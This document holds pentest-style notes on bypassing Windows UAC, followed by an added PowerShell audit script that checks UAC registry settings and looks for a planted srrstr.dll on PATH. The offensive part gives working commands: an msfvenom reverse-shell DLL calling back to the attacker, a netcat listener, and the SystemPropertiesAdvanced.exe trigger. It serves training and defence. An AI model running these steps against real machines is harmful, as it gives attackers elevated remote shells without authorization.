UAC bypasses leverage flaws or unintended functionality in different Windows builds.
The following repository contains many different UAC Bypassing Techniques: https://github.com/hfiref0x/UACME
Check if UAC is enabled (0x1=true): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Check the UAC level (0x5=max level): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
To check the Windows Build: [environment]::OSVersion.Version
Check the UACME repository to see whether a technique exists for the target build number.
- We can bypass UAC by placing a malicious srrstr.dll in the WindowsApps folder, which will be loaded in an elevated context.
- Generate the malicious DLL file:
msfvenom -p windows/shell_reverse_tcp LHOST=our-ip LPORT=listening-port -f dll > srrstr.dll
- Transfer the DLL to the target machine
- Start a netcat listener on the attacker machine:
nc -lvnp 4444
- Trigger the DLL load and get a reverse shell by running:
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
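From the defender's side, the same registry values and the srrstr.dll artifact make a quick audit. The following PowerShell script is an added example, not part of the original notes or of UACME: it reads the UAC policy keys queried above, labels ConsentPromptBehaviorAdmin with its documented meaning, and reports any srrstr.dll found in a PATH directory outside the Windows system or Program Files trees (the per-user WindowsApps folder is such a directory). It assumes Windows PowerShell 5.1 or later; the list of "trusted" roots is an assumption you may want to tighten.

```powershell
# Added example, not from the original notes: audit UAC settings and look for a
# planted srrstr.dll on PATH. Assumes Windows PowerShell 5.1+ on Windows.
$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$policy    = Get-ItemProperty -Path $policyKey

# Documented meanings of ConsentPromptBehaviorAdmin
$consentMeaning = @{
    0 = 'Elevate without prompting (UAC effectively off for administrators)'
    1 = 'Prompt for credentials on the secure desktop'
    2 = 'Prompt for consent on the secure desktop ("Always notify")'
    3 = 'Prompt for credentials'
    4 = 'Prompt for consent'
    5 = 'Prompt for consent for non-Windows binaries (default)'
}

$consent = $policy.ConsentPromptBehaviorAdmin
$uacState = [pscustomobject]@{
    Build                      = [System.Environment]::OSVersion.Version.ToString()
    EnableLUA                  = $policy.EnableLUA
    ConsentPromptBehaviorAdmin = $consent
    Meaning                    = if ($null -ne $consent) { $consentMeaning[[int]$consent] } else { 'not set (defaults apply)' }
    PromptOnSecureDesktop      = $policy.PromptOnSecureDesktop
}
$uacState | Format-List

# srrstr.dll in a user-writable PATH directory is the artifact of the
# SystemPropertiesAdvanced.exe hijack described above. The roots treated as trusted
# here are an assumption; adjust them to your environment.
$trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

$findings = foreach ($dir in ($env:PATH -split ';' | Where-Object { $_ })) {
    $candidate = Join-Path -Path $dir -ChildPath 'srrstr.dll'
    if (Test-Path -LiteralPath $candidate) {
        $inTrusted = $false
        foreach ($root in $trustedRoots) {
            if ($dir -like "$root*") { $inTrusted = $true }
        }
        [pscustomobject]@{
            Path       = $candidate
            Suspicious = -not $inTrusted
            Signature  = (Get-AuthenticodeSignature -FilePath $candidate).Status
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize } else { 'No srrstr.dll found on PATH.' }
```

Run it from an ordinary (non-elevated) prompt, since the hijack abuses the user's own PATH: a Suspicious=True hit with an unsigned or untrusted signature status is the finding to investigate, and EnableLUA=0 or ConsentPromptBehaviorAdmin=0 means no bypass is even needed.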